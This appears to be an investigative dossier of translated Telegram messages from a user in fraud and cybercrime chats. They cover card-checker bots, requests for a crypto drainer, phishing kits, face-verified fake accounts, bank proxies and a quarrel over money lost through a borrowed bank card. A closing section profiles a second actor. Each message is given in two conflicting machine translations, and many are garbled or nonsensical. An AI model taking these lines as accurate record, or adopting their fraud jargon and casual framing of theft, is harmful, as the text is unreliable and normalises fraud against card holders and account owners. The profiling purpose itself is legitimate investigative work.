Bonya2026-03-14 13:17
Aku sudah tahu caranya, tapi aku terlalu malas untuk menjelaskannya.Aku sudah mengerti caranya, tapi malas menjelaskannya
B
Bonya2026-03-14 13:17
Dia pasti bakal menghancurkanmu, apa pun yang terjadi.Dia pasti bakal menipumu, apa pun yang terjadi
B
Bonya2026-03-12 17:16
Dengan berbagai cara.Berbagai macam
B
Bonya2026-03-12 17:08
+ ditambah lagi, saat ini sedang banyak terjadi badai.+ Saat ini badai sedang kencang
B
Bonya2026-03-12 17:07
Kalau warnanya hitam, aku yakinKalau warnanya hitam, aku pasti bakal bertaruh
B
Bonya2026-03-12 17:07
Tergantung jenis penawarannya; kalau warnanya putih, ya.Tergantung penawarannya; kalau yang putih, ya
B
Bonya2026-03-12 17:06
Itu dua dunia yang berbedaDua dunia yang berbeda itu adalah
B
Bonya2026-03-12 17:06
Tidak ada yang lainSama sekali tidak ada yang lain
B
Bonya2026-03-12 17:06
Anda dapat mengaturnya agar hanya PCDi sana, Anda bisa mengatur agar hanya PC yang ditampilkan
B
Bonya2026-03-12 17:05
Google ternyata tidak seefektif yang saya kira.Menurut saya, Google tidak seefektif itu
B
Bonya2026-03-12 17:05
Yah, aku nggak pakai Google, cuma pakai Facebook aja.Yah, aku nggak pakai Google, cuma pakai Facebook aja
B
Bonya2026-03-12 17:05
Selama kamu harus mencari ligatur sepanjang proses itu.Dengan syarat bahwa semua hal konyol ini masih perlu disatukan menjadi satu kesatuan
B
Bonya2026-03-12 17:04
Bola-bola yang meleset, bola-bola yang melesat ke luar lapangan, beterbangan layaknya badai. Dan sebagainya.Rejects, akun-akun itu hilang begitu saja seperti badai. Dan seterusnya
B
Bonya2026-03-12 17:04
Nggak semuanya indah, bro.Bukan cuma itu, bro, masih ada lagi, lho
B
Bonya2026-03-12 17:03
Semua akuisisi maskapai penerbangan reguler yang lebih dapat dipercayaSemua baterai biasa dengan daya tahan terbaik
B
Bonya2026-03-12 17:03
Saat ini tidak ada biro yang bagus di pasaran.Saat ini tidak ada agen yang bagus di pasar
B
Bonya2026-03-12 17:02
Lebih bikin deg-degan daripada menakutkanLebih ke gugup daripada takut
B
Bonya2026-03-12 17:02
Kripto, naluri perjudian, dan ke-hitaman semuanya meluapKripto, game online, dan konten gelap semuanya mengalir
B
Bonya2026-03-12 17:01
Hal terakhir yang dilakukan pemerintah kota adalah meretas 2d.Hal terakhir yang muncul di kota dalam 2D itu keren
B
Bonya2026-03-12 17:01
Jika kamu mencari saya—entah atas inisiatif sendiri atau karena pertimbangan anggaran—untuk menemukan game panjat tebing 2D, kamu perlu menyiapkan 1-2 ribu zeles untuk biaya pengujian, dan itu tidak akan bertahan lama.Bisa saja, kalau mau dicari—entah dari dana sendiri atau dari anggaran—untuk menemukan yang cocok untuk 2D, perlu menghabiskan 1-2 ribu zel untuk pengujian, dan itu pun tidak akan bertahan lama.
B
Bonya2026-03-12 17:00
Aku sedang menuangkanAku menuangkan
B
Bonya2026-03-12 16:59
(Karena tidak ada persyaratan semacam itu untuk penawaran kepada orang kulit putih)Karena itu, tidak ada persyaratan seperti itu untuk penawaran putih)
B
Bonya2026-02-14 14:33
Siapa yang memiliki status "dreiner" dalam tes AML? Hanya jika ada "dep" atau "ready" pada penjaminAdakah yang punya drainer untuk tes AML? Hanya yang masih dalam kemasan atau yang sudah siap pakai dengan jaminan?
B
Bonya2026-01-11 03:14
Ada seseorang di grup FB Beat, dan ada seorang teman. Butuh isi ulang FB, harganya bisa dinegosiasikanAda yang sudah pernah bermain di FB, dan ada taruhan. Perlu mengisi saldo FB, soal harganya bisa kita bicarakan nanti
-- STYX SNAT [ STYXMARKET.ST ] (2 pesan) --
B
Bonya2025-12-05 12:04
Butuh faktur, Payzaty, Cashfree, Eportal 3dsButuh faktur, Payzaty, Cashfree, Eportal 3ds
B
Bonya2025-11-22 11:14
Apakah ada penjamin obrolan?Ada yang bertugas di obrolan ini?
-- Obrolan Arbitrase Lalu Lintas (2 pesan) --
B
Bonya2025-11-24 14:50
100%100%
B
Bonya2025-11-24 14:49
Saluran Tg akan dibajakSaluran TG akan di-hack
-- Pemeriksa CC Raven (2 pesan) --
B
Bonya2025-11-21 21:19
/help@SDBB_Bot/help@SDBB_Bot
B
Bonya2025-11-21 21:18
/check/check
-- Obrolan Vision Browser (2 pesan) --
B
Bonya2025-11-14 16:47
Terima kasih.Terima kasih
B
Bonya2025-11-14 16:47
vicen kerja di ru?Apakah ini "vision work" dalam bahasa Rusia?
-- 💬ONE|Obrolan (86 pesan) --
B
Bonya2025-03-05 17:06
Teman-teman, tolong kasih tahu aku toko mana yang jual pembalut.Teman-teman, kasih tahu dong toko mana aja yang jual tempat main itu
B
Bonya2025-03-05 16:22
bahkan nggak bisa bersikap hiperaktifBahkan manik saja dia tidak bisa
B
Bonya2025-03-05 16:22
demikian pulademikian pula
B
Bonya2025-03-05 16:21
Jawab dong, sialan, apakah mentor itu punya ruang obrolan dengan para siswa atau tidak.Sial, ada yang bisa jawab nggak, apakah pembimbing punya grup obrolan dengan murid-muridnya atau nggak?
B
Bonya2025-03-05 16:10
dan siapa sih ituSiapa yang ngomong?
B
Bonya2025-03-05 15:44
Ini tidak sulit, tapi di sini tidak ada panduan lengkap, hanya ada tutor.Di sana tidak sulit, tapi di sini tidak ada buku panduan yang lengkap; hanya ada dari para pembimbing
B
Bonya2025-03-05 15:42
Pada dasarnya, ya, kalau kamu tahu caranya.Sebenarnya, ya, kalau kamu bisa
B
Bonya2025-03-05 15:42
setengah harisetengah hari
B
Bonya2025-03-05 15:42
Yang pertama ada 600 orang, dia tidak menjawab.Pada 600 orang pertama, dia tidak merespons
B
Bonya2025-03-05 15:41
Kalau kamu punya uangnya, beli saja yang harganya $200 itu.Kalau ada nenek-nenek, pilih saja yang minta 200 dolar itu
B
Bonya2025-03-05 13:55
Siapa yang jago banget ngajar di ruang obrolan siswa?Apakah ada obrolan siswa di sana bagi para penggemar fiksi ilmiah yang sedang belajar?
B
Bonya2025-03-03 15:10
CekKuitansi
B
Bonya2025-03-03 15:10
Yang berfungsi sebagai penyedot debuYang sedang menyedot debu
B
Bonya2025-03-03 15:10
Oke, pahamAda
B
Bonya2025-03-03 15:10
Mungkin saja ada pelacur yang menggunakan perangkat lunak.Nah, di sini pasti ada peretas yang pakai perangkat lunak
B
Bonya2025-03-03 15:09
Itu adalahDulu
B
Bonya2025-03-03 15:09
Oh, bagus juga.Wah, ini keren banget
B
Bonya2025-03-03 15:09
Trinuriuet ruruTrinuriuet ruru
B
Bonya2025-03-03 15:09
Dan barang-barang itu sedang dikumpulkanDan buah-buahan itu dipetik
B
Bonya2025-03-03 15:09
Tip cuma duduk di sana sambil mengutak-atik bungkusannyaSi Tip sedang duduk sambil mengobrol santai
B
Bonya2025-03-03 15:04
Mengapa ada pelat nomor Ukr?Lalu, untuk apa nomor Ukraina?
B
Bonya2025-03-03 15:03
Aku bilang, "kc."Aku bilang kts
B
Bonya2025-03-03 15:03
Aku mengerti.Saya mengerti
B
Bonya2025-03-03 15:03
Kalau situasinya rumit, kamu bakal kehilangan topi bowler-mu.Kalau di sini, panci kamu bisa terlepas
B
Bonya2025-03-03 15:03
Sial, ayo kita bandingkan berapa kali kamu bakal menjalankan rekul FB itu sementara aku sedang mengangkat roux-nya.Sial, ayo bandingkan—berapa kali kamu bakal menjalankan fitur pemulihan Facebook sementara aku merekamnya
B
Bonya2025-03-03 15:02
Untuk seorang pendampingLayanan pendamping
B
Bonya2025-03-03 15:02
Orang-orang itu punya kelakuan yang bikin orang jadi brengsek.Orang-orang seperti itu memang suka bikin onar dan main-main
B
Bonya2025-03-03 15:02
Sial, di sini semuanya orang-orang progresif.Sial, di sini cuma ada para pekerja kasar
B
Bonya2025-03-03 15:02
Jenis meja apaMeja apa saja
B
Bonya2025-03-03 15:01
Jika suaramu merdu, angka 30 akan menjadi milikmu.30 akan menjadi milikmu jika suaramu merdu
B
Bonya2025-03-03 15:01
Ada lebih banyak uangDi sana ada lebih banyak uang
B
Bonya2025-03-03 15:01
Ayo bekerja di tempat usaha saya.Ayo datang ke pusat komunitas untuk bekerja bersamaku
B
Bonya2025-03-03 15:00
TidakTidak
B
Bonya2025-03-03 14:59
PlategamPlategam
B
Bonya2025-03-03 14:59
+ Saya tidak tahu cara menggunakan fitur replay+ Aku nggak paham soal hal-hal seperti itu
B
Bonya2025-03-03 14:59
Produk berkualitas memang sulit ditemukan.Drops yang bagus juga sulit ditemukan
B
Bonya2025-03-03 14:58
Atau apakah ada versi 1.0?Atau versi 1.0 sudah ada
B
Bonya2025-03-03 14:58
Di sini hanya ada 2,0 phish.Dan di sini ada kabel dengan arus 2,0
B
Bonya2025-03-03 14:58
Atau lebih baik 1.0 daripada 2.0.Yah, lebih baik 1.0 daripada 2.0
B
Bonya2025-03-03 14:57
Bersama mammothBersama mamut
B
Bonya2025-03-03 14:57
2.0 nggak bakal berhasil kalau cuma duduk-duduk sambil main-main.2.0, nggak asyik cuma duduk-duduk sambil ngobrol ngalor-ngidul
B
Bonya2025-03-03 14:57
Saya lebih ke bidang lalu lintas.Bukan saya yang paling banyak dikunjungi
B
Bonya2025-03-03 14:57
Ini dia "X's" karya RooIni tanda silang di tangan
B
Bonya2025-03-03 14:56
Tapi ini bukan tim periklananTapi ini bukan tim pemasaran
B
Bonya2025-03-03 14:56
Memang benar. Aku kenal seseorang yang begitu.(Ada) kenalan yang melakukannya
B
Bonya2025-03-03 14:56
Tapi kalau kamu tahu cara menghasilkan 400-500 sehari, itu lain cerita.Ah, tidak juga. Kalau bisa, orang-orang seperti itu bisa menghasilkan 400-500 per hari.
B
Bonya2025-03-03 14:55
Jadi, apa sih masalahnya?)Ya, terus apa yang ketinggalan di sini, sih? )
B
Bonya2025-03-03 14:55
Ada tautan ke manualnyaDi sana ada tautan ke manual
B
Bonya2025-03-03 14:54
Inilah jenis tangan-tangan seperti iniInilah yang akan mereka lakukan
B
Bonya2025-03-03 14:54
Sampai ngiler dan ngeliatin terus cuma buat dapet sentuhan.Sial, buat bikin orang terangsang, bisa aja ngeluarin air liur dan melebarkan mata ke dua arah
B
Bonya2025-03-03 14:54
Nah, apa masalahnya? Kan itu pekerjaan yang sama.Ya, terus apa masalahnya sih? Kan ini juga kerjaan yang sama
B
Bonya2025-03-03 14:53
Butuh waktu sebulan untuk sampai ke zona ituAkan dibawa ke zona tersebut dalam waktu sebulan
B
Bonya2025-03-03 14:53
Dan tidak ada tempat untuk pergi. Kalau kamu punya otak, kamu pasti bisa mengerti. Kalau tidak, kamu harus pergi dari sini.Lagipula, nggak ada yang bisa dilakukan di sini. Kalau punya akal sehat, pasti bisa mengerti; kalau nggak, ya nggak ada yang bisa dilakukan di sini.
B
Bonya2025-03-03 14:53
Apa yang kamu inginkan?Apa yang kamu mau?
B
Bonya2025-03-03 14:53
IklanIklan
B
Bonya2025-03-03 14:52
Aku sudah di sini selama 2 hari dan versi 2.0 ternyata nggak menarik. Padahal aku kira itu keren.Aku sudah dua hari di sini dan versi 2.0 nggak menarik; padahal aku kira pasti seru
B
Bonya2025-03-03 14:52
Dan nikmati mammoth-nyaDan memelihara seekor mamut
B
Bonya2025-03-03 14:52
Gunakan akal sehatmu untuk memikirkan apa yang akan kamu katakan.Aku harus memikirkannya dulu sebelum menjawab
B
Bonya2025-03-03 14:52
Tidak ada rahasiaTidak ada rahasia di sini
B
Bonya2025-03-03 14:52
Apa yang akan dia berikan kepadamu?Apa yang akan dia berikan kepada Anda?
B
Bonya2025-03-03 14:52
Nah, apa gunanya kalau buku panduannya berisi informasi yang sama saja.Lalu, apa gunanya kalau di manualnya ada semua informasi itu?
B
Bonya2025-03-03 14:51
Dia bakal punya waktu buat menanggapi semua komentar kasar kalianKami tidak akan bisa membalas pesan kalian semua
B
Bonya2025-03-03 14:51
Latihan yang luar biasa.Praktik apa?
B
Bonya2025-03-03 14:51
Ada 100 orang di dalam sana.Wah, di sana ada sekitar 100 orang
B
Bonya2025-03-03 14:51
Kenapa kamu nggak kasih aku uang aja, nanti aku kasih kamu buku petunjuk dari penjepit itu.Mungkin bisa kirim duit ke aku? Nanti aku kasih manualnya lewat pesan pribadi
B
Bonya2025-03-03 14:50
Dalam memperbaikiDi bagian pengikat
B
Bonya2025-03-03 14:50
Kamu tidak perlu buku panduan untuk mengajarkan semuanya kepadamu.Ah, sudahlah, kalian semua, panduan pengguna sudah ada kok
B
Bonya2025-03-03 14:50
2.0 ya begitulah adanya.2.0: Seperti dulu, begitu pula sekarang
B
Bonya2025-03-03 14:50
Ada masalah apa sih, sih?Wah, soal ini susah banget
B
Bonya2025-03-03 14:48
Apakah kamu yang memulainya sendiri?Kamu sudah mencobanya sendiri?
B
Bonya2025-03-03 14:48
Bukan orang gilaSama sekali tidak berfungsi
B
Bonya2025-03-03 14:48
Ada serangan terhadap lkDi LK ada pembunuhan
B
Bonya2025-03-03 14:48
Ada apa sih dengan lk itu?Apa saja jenis pekerjaan di bidang LK?
B
Bonya2025-03-03 14:48
Manakah di antara kalian ini yang disebut "bajingan", seperti yang kalian katakan?Dari siapa sih omong kosong ini, maaf kalau kata-kataku kasar
B
Bonya2025-03-03 14:47
Saya tidak mengerti apa yang kamu maksud di sini.Di bagian ini aku nggak paham apa yang kamu katakan
B
Bonya2025-03-03 14:46
Kalau mereka sudah masuk, baguslah.Jika masuk ke lk, maka zbs
B
Bonya2025-03-03 14:46
Nah, apakah mereka masuk?Jadi, kalian masuk ke halaman profil?
B
Bonya2025-03-03 14:45
Aku tidak tahu bagaimana mereka memotretnya.Entahlah, aku nggak paham gimana cara merekamnya
B
Bonya2025-03-03 14:45
Anjing-anjing yang harus dihapus?Apakah ada barang yang akan dihapus?
B
Bonya2025-03-03 14:45
Sial, ada tombol tekan sialanAh, sudahlah, jangan repot-repot lagi
B
Bonya2025-03-03 14:42
Aku menuangkannya sendiriAku sendiri yang menuangkannya
B
Bonya2025-03-03 14:42
Aku baru sadar, sialan, ternyata ini bukan main-main.Aku beneran ngerti, tapi itu nggak ada gunanya
B
Bonya2025-03-03 14:41
Bro, di sini nggak ada yang dijual pakai chip, ini chip khusus hari gajian.Di sini, Bratan, tidak ada yang dijual dengan chip; chip di sini hanya untuk pembayaran.
B
Bonya2025-03-03 14:41
Aku paham, nggak ada tempat buat menuangkannyaAku mengerti, di sini tidak ada tempat untuk menuangkannya
B
Bonya2025-03-03 14:40
Regular 2.0, kurasa.Versi 2.0 standar, sepertinya
B
Bonya2025-03-03 14:40
Bukan berarti lalu lintasnya macet parahJadi, di sini mereka tidak langsung mengalirkan lalu lintas
-- FbStor - Obrolan Para Webmaster Sukses! (23 pesan) --
B
Bonya2025-02-26 07:51
Ya sudah, lakukan saja apa pun yang mau kamu lakukan, dasar...Nah, begitulah, lakukan saja di sana, siapa peduli wajah siapa
B
Bonya2025-02-26 07:50
Seorang siswa sekolah, 200₽.Ya, siswi itu 200₽ saja
B
Bonya2025-02-26 07:50
Pasti berhasilMungkin bisa
B
Bonya2025-02-26 07:50
Kamu akan menemukan seorang tunawisma di jalan.Di jalan, tangkaplah gelandangan itu dan bawa pergi
B
Bonya2025-02-26 07:50
Jadi, setiap orang percaya pada penampilannya sendiri, siapa pun orangnya.Jadi, semua orang memverifikasi dengan foto wajah mereka sendiri di sana, siapa peduli?
B
Bonya2025-02-26 07:50
Di wajahmu.Di wajah sendiri
B
Bonya2025-02-26 07:49
Tapi faktanya, bagaimanapun juga, aku sudah melakukannya 10 kali.Tapi sebenarnya, ya sudahlah, aku punya sekitar 10 akun yang sudah diverifikasi
B
Bonya2025-02-26 07:49
Jadi, katakanlah, kamu cuma ngomongin omong kosong.Jadi, katakanlah, apa yang kamu omongkan itu?
B
Bonya2025-02-26 07:49
Anda bisaBoleh
B
Bonya2025-02-26 07:49
Di wajahmu.Di wajah sendiri
B
Bonya2025-02-16 20:26
daripada malah bikin mereka kacau dengan semacam pelatihan dan memaksa mereka menghadapi lalu lintas.bukan malah menipu orang dengan pelatihan semacam itu dan memanfaatkan mereka untuk mengarahkan lalu lintas
B
Bonya2025-02-16 20:25
lei biasa, ubt, tt, tt, YouTube, dll.video-video biasa di UBT, TT, YouTube, dan sebagainya
B
Bonya2025-02-15 17:31
XzHz
B
Bonya2025-02-15 17:31
Dengan dalih pelatihanDengan dalih pendidikan
B
Bonya2025-02-15 17:31
Menuju kanal-kanalKe saluran-saluran
B
Bonya2025-02-15 17:31
Itu cuma keramaian dari orang-orang.Lalu lintas dari orang-orang itu memang bikin pusing
B
Bonya2025-02-15 17:31
Jadi, orang itu menyarankan untuk berlangganan semua salurannyaJadi, orang itu bilang untuk berlangganan semua salurannya
B
Bonya2025-02-15 16:36
Kamu tidak perlu menulisHuinyu menyarankan agar Anda tidak perlu menulis
B
Bonya2025-02-06 15:11
Kalau kamu nggak tahu dasar-dasar cara menuangkan, kamu bakalJika kamu tidak menguasai dasar-dasar seperti cara menuang, bagaimana kamu bisa melakukannya?
B
Bonya2025-02-06 15:11
Ada tombol untuk mengubah aipi, kamu setidaknya harus mencarinya di Google.Kalau klik tombol itu, alamat IP-nya berubah; coba saja cari di Google
B
Bonya2025-02-06 15:10
🤨🤨
B
Bonya2025-02-06 15:09
Kamu bisa mengubah posisi aipi di sana dengan memutarnya.Di sana, AI PI dapat mengubah rotasi
B
Bonya2025-02-06 15:09
Mengapa 1? Karena itu sama saja dengan ponselKenapa angka 1? Kan itu Ponsel
-- CryptoGrab - Obrolan Saling Membantu (10 pesan) --
B
Bonya2025-02-06 15:31
Tidak sesederhana ituTidak sesederhana itu
B
Bonya2025-02-06 15:31
Mudah.Izi
B
Bonya2025-01-23 20:30
Tidak ada satu pun contohBukan hanya satu contoh
B
Bonya2025-01-23 20:30
Sungguh tidak lucu bahwa saya tidak bisa menemukan iklan apa pun tentang tes AML di internet.Lucunya, aku sama sekali nggak nemu iklan tes AML di internet
B
Bonya2025-01-23 17:20
Tidak ada apa-apa sama sekali di AML.Di AML sama sekali tidak ada apa-apa
B
Bonya2025-01-23 17:20
Saya mencoba AML di Facebook untuk mencari informasi tentang Amerika; ternyata cukup berguna, bahkan paket-paket lama yang tidak ditemukan di internet pun ada di sanaSaya sudah mencoba mencari informasi tentang AML di Facebook, tapi di internet pun saya tidak menemukan sumber yang bisa diandalkan, bahkan yang sudah lama sekalipun.
B
Bonya2025-01-23 17:19
Nah, tawaran seperti apa yang kamu rencanakan?Nah, secara umum, penawaran seperti apa yang kamu rencanakan?
B
Bonya2025-01-23 17:16
Apakah Anda menggunakan AML?Kamu main AML nggak?
B
Bonya2025-01-21 20:38
Siapa pun yang mengunggah di Facebook mungkin ingin mengklarifikasi beberapa pertanyaanAdakah yang mengelola halaman Facebook? Saya ingin menanyakan beberapa hal
B
Bonya2025-01-20 11:08
Adakah yang punya contoh kreos untuk AML?Adakah yang punya contoh kreos untuk AML?
-- Rolex | obrolan umum (28 pesan) --
B
Bonya2024-09-11 15:29
Apa yang sedang dilakukan para pemain Lithuania di lapangan mana?Di platform mana sih Lithuania sedang dihajar?
B
Bonya2024-09-11 15:21
Kamu lagi main-main sama sekrupnya?Kamu lagi ngomong ngawur, ya?
B
Bonya2024-09-11 15:20
Hanya saja, situs-situs itu sangat ketat dan bikin repot banget kalau mau mengutak-atiknyaMasalahnya, platform-platform itu sangat membatasi pekerjaan dan banyak sekali kerumitan yang harus dihadapi dengan mereka
B
Bonya2024-09-11 15:19
Aku sudah punya ide tema. Kalau mereka melakukannya, pasti bakal keren banget.Aku udah kepikiran satu ide di sana, terus langsung nulisnya. Kalau jadi, pasti bakal keren banget.
B
Bonya2024-09-11 15:19
Saya tidak melihat banyak jejak di finca itu.Aku nggak terlalu lihat logo-logo di bagian depan, sih
B
Bonya2024-09-11 15:19
Ada masalah yang benar-benar kacau di semua tempat acara itu.Ah, ya, orang-orang itu pasti lagi ribut-ribut soal semua arena
B
Bonya2024-09-11 15:16
Itulah yang aku maksud, ini seperti menyeberangi sungai di atas sungai.Nah, kan aku bilang, penipuan di atas penipuan
B
Bonya2024-09-11 15:15
Aku nggak ngerti apa yang sekarang jadi lebih baik, soalnya aku lihat semua orang di Finlandia nggak kerja.Aku sama sekali nggak ngerti mana yang sekarang lebih lancar; kelihatannya ada yang nggak beres di sistem keuangan mereka semua
B
Bonya2024-09-11 15:08
Yah, peluangnya 50-50 kalau kamu beruntung dengan proxy-proxy itu.Yah, 50/50 kalau beruntung dengan proksi
B
Bonya2024-09-11 15:07
Tapi biar kamu paham, sekarang ini, dengan proxy mewah, bahkan di Viber, begitu kamu masuk, sistemnya jadi kacau.Tapi biar kamu paham, sekarang dengan proxy mewah, bahkan di Viber pun, kalau kamu masuk, itu jadi terdeteksi
B
Bonya2024-09-11 15:07
Wah, aku nggak tahu soal kaleng-kaleng dari Uni Eropa itu.Yah, aku nggak paham soal bank-bank Uni Eropa
B
Bonya2024-09-11 15:07
Dalam lkDi lk
B
Bonya2024-09-11 15:06
Dulu, toko-toko makanan mewah itu punya 10 lemari pendingin berukuran besarDulu, cat mewah yang diaplikasikan dalam 10 lapisan bisa bertahan
B
Bonya2024-09-11 15:06
Nah, 922 juga sudah mencapai 1 in dan tetap stabil.Nah, 922 juga masuk 1, mereka menahannya
B
Bonya2024-09-11 15:05
Bahkan jika dilakukan secara pribadi setelah 3 kali kunjungan, hal itu tetap membuat mereka ketakutan.Bahkan di ruang obrolan pribadi, setelah 3 kali masuk, mereka tetap menipu
B
Bonya2024-09-11 15:05
Jika 1 proxy mewakili 1–2 bankJika 1 proxy untuk 1–2 bank arus
B
Bonya2024-09-11 15:05
Yah, itu tergantung bank manaTergantung banknya
B
Bonya2024-09-11 15:04
Para wakil itu sering kali sangat kotor dalam omong kosong laksheriDi situs-situs porno, proxy sering kali terinfeksi virus
B
Bonya2024-09-11 08:44
Apakah itu sedang tidur?Apakah dia sedang tidur?
B
Bonya2024-09-11 08:40
Oh, itu ide yang bagus.Siapa yang memikirkan ZBS?
B
Bonya2024-09-11 08:40
Apa di sana nggak ada semacam pasar loak atau semacamnya?Lalu, kenapa mereka nggak punya semacam pasar loak yang tersebar di sana-sini?
B
Bonya2024-09-11 08:40
Kacau balauHuevo
B
Bonya2024-09-11 08:39
BilyaBilya
B
Bonya2024-09-11 08:39
Apakah ada ruang obrolan?Apakah di sana ada ruang obrolan?
B
Bonya2024-09-11 08:38
Adakah yang tahu?Adakah yang tahu?
B
Bonya2024-09-11 08:38
Apakah orang-orang di finca menggunakan TG?Apakah orang-orang di Finlandia menggunakan Telegram?
B
Bonya2024-09-10 12:14
Terima kasih.Terima kasih
B
Bonya2024-09-10 12:13
Jam berapa sekarang di Finlandia?Sekarang waktunya melompat di Finka
-- Terkini/verifikasi/penghasilan💃🛍 (37 pesan) --
B
Bonya2024-06-16 17:17
Saya tidak melihat ada yang membelanya dengan gigihSaya tidak melihat ada pendukung setia dirinya di sini
B
Bonya2024-06-16 17:17
Yah, intinya situasinya sudah dijelaskan, dan kemudian setiap orang membuat pilihannya sendiri, dan fakta bahwa hanya admin Pasha yang membelanya sudah cukup menjelaskan segalanya.Nah, saya sudah menjelaskan situasinya; selanjutnya, setiap orang bebas menentukan pilihannya sendiri. Dan fakta bahwa hanya admin Pasha yang membelanya itu sudah cukup berbicara banyak.
B
Bonya2024-06-16 17:15
Dan dia tidak membayarnya lagiDan dia lagi-lagi tidak membayarnya
B
Bonya2024-06-16 17:15
Tidak, dia mentransfernya ke kami, dan kemudian kami tidak memiliki rekening utama untuk mentransfer uang tersebut, jadi kami menulis surat kepada Vika sebagai upaya terakhir.Bukan, dia malah mengalihkannya ke kami, tapi saat itu kami tidak punya metode pembayaran utama untuk mentransfer uang, jadi kami menghubungi Vike sebagai pilihan terakhir.
B
Bonya2024-06-16 17:14
Awalnya kami juga baik-baik saja, tapi belakangan ini uangmu terus-menerus hilang.Awalnya semuanya juga baik-baik saja di sini, tapi belakangan ini uang kalian terus-menerus hilang
B
Bonya2024-06-16 17:14
Apakah aku dianggap melakukan spam? Aku hanya duduk di sini dan mengatakan yang sebenarnya kepada orang-orang. Silakan saja abaikan. Biarkan orang-orang tahu bagaimana cara kerjamu.Apakah ini spam? Aku di sini hanya menceritakan kebenaran kepada orang-orang. Silakan hapus saja—apa bedanya? Biarkan orang-orang tahu bagaimana cara kalian bekerja.
B
Bonya2024-06-16 17:13
Jika Anda memiliki salah satu dari iniJika hal seperti itu terjadi pada Anda
B
Bonya2024-06-16 17:13
Jadi, inilah saatnya bagi kamu untuk merenungJadi, inilah saatnya bagi kalian untuk merenung
B
Bonya2024-06-16 17:13
Kami juga sudah lama bekerja sama dengan nei, dan ini adalah kejadian keduaKami juga sudah lama bekerja sama dengannya dan ini sudah kali kedua hal seperti ini terjadi
B
Bonya2024-06-16 17:13
Lalu dia merekam gs-nya dan berkata, “Kamu tahu kan cara kerjanya.”Lalu dia mencatat GS dan berkata bahwa Anda tahu cara kerjanya
B
Bonya2024-06-16 17:13
Itulah persisnya yang terjadi. Ayo kita mulai dari awal: kami mengambil kartunya untuk mengambil uang, kami memasukkan 60 ribu, dia pergi untuk menariknya, lalu dia bilang uangnya tidak akan ada di sana karena ATM-nya menelan kartunya, dan begitulah, kami baru saja membuang 60 ribu.Ya, begitulah ceritanya. Begini, mari kita mulai dari awal: kami meminjam kartu ATM-nya, lalu memasukkan 60 ribu. Dia pergi untuk menarik uangnya, tapi kemudian bilang uangnya tidak akan keluar—katanya mesin ATM-nya menelan kartunya—dan begitulah, kami pun kehilangan 60 ribu itu.
B
Bonya2024-06-16 17:11
Bukan dia yang mengendalikan kitaBukankah justru kita yang ada di sana?
B
Bonya2024-06-16 17:11
Meskipun memang ada 60 ribu yang dicuriMeskipun uang kami sebesar 60 ribu telah dicuri
B
Bonya2024-06-16 17:11
Normal? Kami sudah menjelaskan semuanya di sini. Kamu bilang kami ini orang bodoh."Normal?" Kami sudah menjelaskan semuanya di sini, tapi kalian malah bilang kami bodoh
B
Bonya2024-06-16 17:10
Kamu membelanyaKalian membelanya
B
Bonya2024-06-16 17:10
Dia masih memegang uang kitaUang kami masih ada padanya
B
Bonya2024-06-16 17:10
SemuanyaSemua
B
Bonya2024-06-16 17:10
Padahal pria itu diberi 60 ribu, dia bilang tidak punya uang.Setelah orang itu diberi 60 ribu, dia bilang uangnya tidak akan ada
B
Bonya2024-06-16 17:10
Dijelaskan*Telah dijelaskan*
B
Bonya2024-06-16 17:10
Seluruh situasinya telah dijelaskan kepada AndaKamu sudah dijelaskan seluruh situasinya
B
Bonya2024-06-16 17:09
Siapa yang menjatuhkannya? Dia atau kita.Siapa yang jadi korban, dia atau kita?
B
Bonya2024-06-16 17:09
Kita punya 60 ribu di bank. Di mana uangnya?Sudah ditransfer 60 ribu, di mana uangnya?
B
Bonya2024-06-16 17:09
Situasinya sudah dijelaskan dengan jelas kepadamu, tidak peduli apa pun jenis kelaminmu.Para wanita mana pun yang sudah menjelaskan seluruh situasinya kepadamu, jenis kelamin sama sekali tidak penting
B
Bonya2024-06-16 17:08
Ambil 60 ribu dan akhiri saja hari ini.Mengumpulkan 60 ribu dan berhenti
B
Bonya2024-06-16 17:08
Atau, ya sudah, terserah kamu—asal masih masuk akal.Atau, apa sih yang kalian pikirkan, selama masih masuk akal
B
Bonya2024-06-16 17:08
Orang-orang tidak punya uang untuk membayar apa punDari mana orang-orang akan membayar?
B
Bonya2024-06-16 17:08
Dan dia bilang kartunya rusak dan dia kehabisan uang.Dan katanya kartu itu macet, nggak ada uang
B
Bonya2024-06-16 17:08
Seorang pria diberi uang 60 ribu, lalu dia pergi untuk menembak.Seorang wanita diberi uang 60 ribu, lalu dia pergi untuk menyewanya
B
Bonya2024-06-16 17:07
Jadi, kamu akan memberi tahu aku fakta-faktanya.Jadi, jelaskanlah berdasarkan fakta
B
Bonya2024-06-16 17:07
Jadi, siapa sih yang harus disalahkan, siapa sih yang bikin aku jadi begini?Jadi, siapa sih yang salah, siapa yang bikin masalah, aku?
B
Bonya2024-06-16 17:07
Tidak ada yang ingin dikatakan?Tidak ada yang bisa dikatakan?
B
Bonya2024-06-16 17:07
Atau aku nggak bisa ngetik PIN sialan itu.Atau apa sih, sialan, tanganku bengkok, jadi nggak bisa menekan tombol pin
B
Bonya2024-06-16 17:06
Gimana sih bisa ATM-nya bikin kartu macet?Gimana sih bisa ATM itu menelan kartu?
B
Bonya2024-06-16 17:06
PengisapPenyedot
B
Bonya2024-06-16 17:06
Dan kamu malah bersemangat banget buat dia.Kalian ini ngapain sih ngunduh video dia di sini?
B
Bonya2024-06-16 17:06
Kalian yang ngaku-ngaku jago itu benar-benar bodoh. Ada seorang wanita di sini yang lagi berurusan dengan uangnya, tapi kartunya malah tersangkut di ATM.Sialan, kalian ini benar-benar gila. Ada orang aneh di sana yang terus-terusan mengoceh bahwa kartunya tersangkut di mesin ATM.
B
Bonya2024-06-16 16:40
@kysia1987, jangan ikuti penipuan itu, dia sudah ditendang keluar dan digabungkan dengan 60 ribu@kysia1987 Jangan ikuti penipuan ini, dia memberi sedikit keuntungan lalu kabur dengan 60 ribu

MONETTI ESCOBAR: Bos yang Diam-diam

Berbeda jauh dengan 261 pesan yang dikirim Bonya, MONETTI hanya memiliki 10 pesan publik — semuanya dalam satu utas di TraFFeeQ Chat (Arbitrase lalu lintas ADS/SEO gelap), membela seorang rekan kerja:

TraFFeeQ ChatDesember 2025
"Seorang pria melakukan pekerjaannya, lalu dia dibayar untuk itu — mau dibahas?"
Orang itu melakukan pekerjaannya, dia dibayar untuk itu, apa lagi yang perlu dibicarakan?)
Menyamakan pekerjaan kriminal sebagai "hanya sekadar pekerjaan"
TraFFeeQ ChatDesember 2025
"Tidak ada yang perlu dibicarakan denganmu"
Tidak ada yang perlu dibicarakan denganmu
